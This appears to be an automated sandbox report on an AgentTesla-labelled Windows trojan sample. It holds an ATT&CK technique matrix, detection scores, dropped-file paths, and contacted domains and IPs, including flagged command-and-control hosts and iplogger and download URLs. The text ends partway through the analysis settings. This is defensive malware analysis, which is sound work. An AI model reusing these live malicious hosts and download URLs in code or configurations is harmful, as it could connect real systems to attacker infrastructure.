External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Virtualization/Sandbox Evasion351	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading121	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Modify Registry11	/etc/passwd and /etc/shadow	System Owner/User Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion351	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Access Token Manipulation1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Process Injection112	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1wOdXavtlE.exe	22%	Metadefender		Browse
1wOdXavtlE.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
1wOdXavtlE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ssevs.exe	100%	Joe Sandbox ML
C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	0%	Metadefender		Browse
C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	3%	ReversingLabs
C:\ProgramData\Immunity\is-02I40.tmp	0%	Metadefender		Browse
C:\ProgramData\Immunity\is-02I40.tmp	4%	ReversingLabs
C:\ProgramData\Immunity\is-1J28N.tmp	3%	Metadefender		Browse
C:\ProgramData\Immunity\is-1J28N.tmp	4%	ReversingLabs
C:\ProgramData\Immunity\is-2SOD7.tmp	8%	Metadefender		Browse
C:\ProgramData\Immunity\is-2SOD7.tmp	14%	ReversingLabs	Win32.Trojan.RemoteUtilities
C:\ProgramData\Immunity\is-4BBH3.tmp	8%	Metadefender		Browse
C:\ProgramData\Immunity\is-4BBH3.tmp	14%	ReversingLabs	Win32.Trojan.RemoteUtilities
C:\ProgramData\is-PFD3D.tmp	55%	ReversingLabs	Win64.Trojan.Starter
C:\ProgramData\is-R3F67.tmp	55%	ReversingLabs	Win32.Backdoor.RaBased
C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\servs.exe	52%	ReversingLabs	Win32.Worm.Ramnit
C:\Users\user\AppData\Local\Temp\ssevs.exe	22%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\ssevs.exe	40%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://86.107.197.8:38214/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	0%	Avira URL Cloud	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetArgumentsResponse	0%	Avira URL Cloud	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
https://bitbucket.orgD8	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://www.iask.com/	0%	URL Reputation	safe
http://pokacienon.xyz/	0%	Avira URL Cloud	safe
http://pokacienon.xyzdr	0%	Avira URL Cloud	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://service2.bfast.com/	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.news.com.au/favicon.ico	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://www.kkbox.com.tw/	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://search.goo.ne.jp/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.etmall.com.tw/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.amazon.co.uk/	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://www.asharqalawsat.com/favicon.ico	0%	URL Reputation	safe
http://search.ipop.co.kr/	0%	URL Reputation	safe
http://search.ipop.co.kr/	0%	URL Reputation	safe
http://search.ipop.co.kr/	0%	URL Reputation	safe
http://www.auction.co.kr/auction.ico	0%	URL Reputation	safe
http://www.auction.co.kr/auction.ico	0%	URL Reputation	safe
http://www.auction.co.kr/auction.ico	0%	URL Reputation	safe
http://www.google.co.uk/	0%	URL Reputation	safe
http://www.google.co.uk/	0%	URL Reputation	safe
http://www.google.co.uk/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bitbucket.org	104.192.141.1	true	false	high
s3-1-w.amazonaws.com	52.216.141.204	true	false	high
pokacienon.xyz	79.141.170.43	true	true	unknown
zen.hldns.ru	194.169.163.42	true	false	unknown
iplogger.org	88.99.66.31	true	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high
api.ip.sb	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://86.107.197.8:38214/	true	Avira URL Cloud: safe	unknown
http://pokacienon.xyz/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.datacontract.org	1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.dailymail.co.uk/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://tempuri.org/	1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	false		high
https://wtfismyip.com/text	1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	false		high
http://fr.search.yahoo.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
https://bitbucket.org	1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://iplogger.org/1tncg7r	1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	false		high
http://www.ya.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy	1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.hanafos.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	servs.exe	false		high
http://search.msn.co.jp/results.aspx?q=	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscar.ozu.es/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.ask.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://tempuri.org/Endpoint/GetArgumentsResponse	1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.it/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.de/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
https://bitbucket.orgD8	1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pchome.com.tw/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gmarket.co.kr/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.google.si/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.soso.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://busca.orange.es/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	false		high
http://www.target.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
https://iplogger.org/1tsTg7Z	1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	false		high
http://search.orange.co.uk/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.centrum.cz/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://pokacienon.xyzdr	1wOdXavtlE.exe, 00000002.00000002.486054377.0000000002DFF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service2.bfast.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ariadna.elmundo.es/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.news.com.au/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://it.search.yahoo.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.ceneo.pl/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.servicios.clarin.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-	1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485408204.0000000002CE9000.00000004.00000001.sdmp	false		high
http://search.daum.net/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
https://iplogger.org/1tsTg78	1wOdXavtlE.exe, 00000002.00000002.483173141.0000000001111000.00000004.00000020.sdmp	false		high
http://www.kkbox.com.tw/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ipinfo.io/ip%appdata%	1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	false		high
http://search.goo.ne.jp/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.msn.com/results.aspx?q=	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://list.taobao.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.taobao.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ie.search.yahoo.com/os?command=	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.cnet.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.linternaute.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.amazon.co.uk/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.fr/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://search.gismeteo.ru/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.rtl.de/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.soso.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.univision.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://search.ipop.co.kr/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.auction.co.kr/auction.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.orange.fr/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://video.globo.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://www.google.co.uk/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscador.terra.com/favicon.ico	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search1.taobao.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high
http://search.aol.co.uk/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.dreamwiz.com/	1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.216.141.204	s3-1-w.amazonaws.com	United States	16509	AMAZON-02US	false
195.54.160.9	unknown	unknown	49505	SELECTELRU	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
86.107.197.8	unknown	Romania	39855	MOD-EUNL	true
88.99.66.31	iplogger.org	Germany	24940	HETZNER-ASDE	false
79.141.170.43	pokacienon.xyz	Bulgaria	61046	HZ-UK-ASGB	true
52.216.179.59	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383846
Start date:	08.04.2021
Start time:	10:59:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 44s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	1wOdXavtlE.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@50/66@28/9
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.9% (good quality ratio 4.1%) Quality average: 65.2% Quality standard deviation: 35.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.26.13.31, 172.67.75.172, 104.26.12.31, 104.83.120.32, 8.238.32.126, 8.238.36.126, 8.238.85.254, 8.238.29.126, 8.238.35.254, 52.155.217.156, 104.43.193.48, 20.54.26.129, 152.199.19.161, 95.100.54.203, 40.88.32.150, 168.61.161.212, 13.64.90.137 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, 